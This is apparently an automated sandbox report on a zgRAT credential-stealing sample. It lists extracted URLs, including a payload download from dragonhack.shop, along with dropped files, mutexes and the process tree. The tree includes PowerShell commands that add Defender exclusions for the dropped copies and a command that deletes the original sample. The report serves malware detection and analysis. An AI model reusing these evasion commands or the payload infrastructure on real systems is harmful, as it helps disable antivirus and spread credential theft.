                                Source: powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                Source: powershell.exe, 00000026.00000002.3079398788.0000021336D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micNb
                                Source: powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.000001906200A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dragonhack.shop
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                Source: qmgr.db.49.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                Source: qmgr.db.49.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622DE000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622F7000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061E0B000.00000004.00000800.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.00000190622B2000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1636177791.0000000001520000.00000004.08000000.00040000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                Source: powershell.exe, 0000001D.00000002.2834190547.00000199CAEB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2794361649.000001CA27DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2762678557.0000015FBD554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2760012226.000001B5C96C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 0000001D.00000002.1758206662.00000199BB067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17F67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9879000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1758206662.00000199BAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131E8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001D.00000002.1758206662.00000199BB067000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17F67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9879000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: powershell.exe, 00000026.00000002.3058103236.0000021336CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
                                Source: powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: powershell.exe, 0000001D.00000002.1758206662.00000199BAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1751751567.000001CA17D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1751139424.0000015FAD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1751641992.000001B5B9651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1750796355.000002131E8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dragonhack.shop
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dragonhack.shop/done.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: svchost.exe, 00000031.00000003.1777211358.000002154D7D1000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.49.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                                Source: svchost.exe, 00000031.00000003.1777211358.000002154D760000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.49.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                                Source: powershell.exe, 00000026.00000002.1750796355.000002131EAD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: powershell.exe, 00000026.00000002.3041543607.0000021336C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5V
                                Source: powershell.exe, 0000001D.00000002.2834190547.00000199CAEB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2794361649.000001CA27DB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2762678557.0000015FBD554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2760012226.000001B5C96C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2750540325.000002132E924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1640008124.0000019071F84000.00000004.00000800.00020000.00000000.sdmp, Bh4cWfQdak.27.dr, xugspH6XJw.27.dr, fJ19GnWkV7.27.dr, 5wWZQCAHla.27.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownHTTPS traffic detected: 91.149.219.45:443 -> 192.168.2.8:49706 version: TLS 1.2
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWindow created: window name: CLIPBRDWNDCLASS

                                System Summary

                                Source: Wh2c6sgwRo.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Windows\Help\Corporate\1156fbdc9c3eb4
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2908AD0_2_00007FFB4B2908AD
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924370_2_00007FFB4B292437
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924900_2_00007FFB4B292490
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924880_2_00007FFB4B292488
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeCode function: 0_2_00007FFB4B2924700_2_00007FFB4B292470
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B299B902_2_00007FFB4B299B90
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B2967A62_2_00007FFB4B2967A6
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B281EC32_2_00007FFB4B281EC3
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B29073A2_2_00007FFB4B29073A
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B2975522_2_00007FFB4B297552
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeCode function: 2_2_00007FFB4B290AF32_2_00007FFB4B290AF3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 37_2_00007FFB4B2A1EC337_2_00007FFB4B2A1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 41_2_00007FFB4B2C1EC341_2_00007FFB4B2C1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 47_2_00007FFB4B291EC347_2_00007FFB4B291EC3
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeCode function: 48_2_00007FFB4B2A1EC348_2_00007FFB4B2A1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 53_2_00007FFB4B2A1EC353_2_00007FFB4B2A1EC3
                                Source: C:\ProgramData\fontdrvhost.exeCode function: 55_2_00007FFB4B281EC355_2_00007FFB4B281EC3
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.000001906202B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.3007715987.000001907AB5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Ex vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019062026000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exe, 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSteal1.exe, vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exeBinary or memory string: OriginalFilenameSteal1.exe, vs Wh2c6sgwRo.exe
                                Source: Wh2c6sgwRo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                Source: Wh2c6sgwRo.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: Wh2c6sgwRo.exe, FMIJCCJDKMPOHDNPCEAGFDMNEAPEGCIPGDDK.csCryptographic APIs: 'CreateDecryptor'
                                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@54/78@4/5
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile created: C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Wh2c6sgwRo.exe.log
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3e5e94f0e11171c3961d1e5f3808d36c9dca912cf9a303ebba50229f9f225d68
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMutant created: NULL
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeMutant created: \Sessions\1\BaseNamedObjects\NsbCvHTAlAlcWgB
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                Source: Wh2c6sgwRo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: Wh2c6sgwRo.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeFile read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061DFB000.00000004.00000800.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061DF1000.00000004.00000800.00020000.00000000.sdmp, wWN8CJ4lbM.27.dr, YXlvdEN7SI.27.dr, 6I3KYvMc2T.27.dr, 6QFthbp1ni.27.dr, szKE9Jtpia.27.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: Wh2c6sgwRo.exeReversingLabs: Detection: 63%
                                Source: Wh2c6sgwRo.exeVirustotal: Detection: 77%
                                Source: unknownProcess created: C:\Users\user\Desktop\Wh2c6sgwRo.exe "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"
                                Source: unknownProcess created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: unknownProcess created: C:\ProgramData\fontdrvhost.exe "C:\Users\All Users\fontdrvhost.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: windows.storage.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: wldp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: profapi.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptsp.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: rsaenh.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: cryptbase.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: sspicli.dll
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeSection loaded: amsi.dll
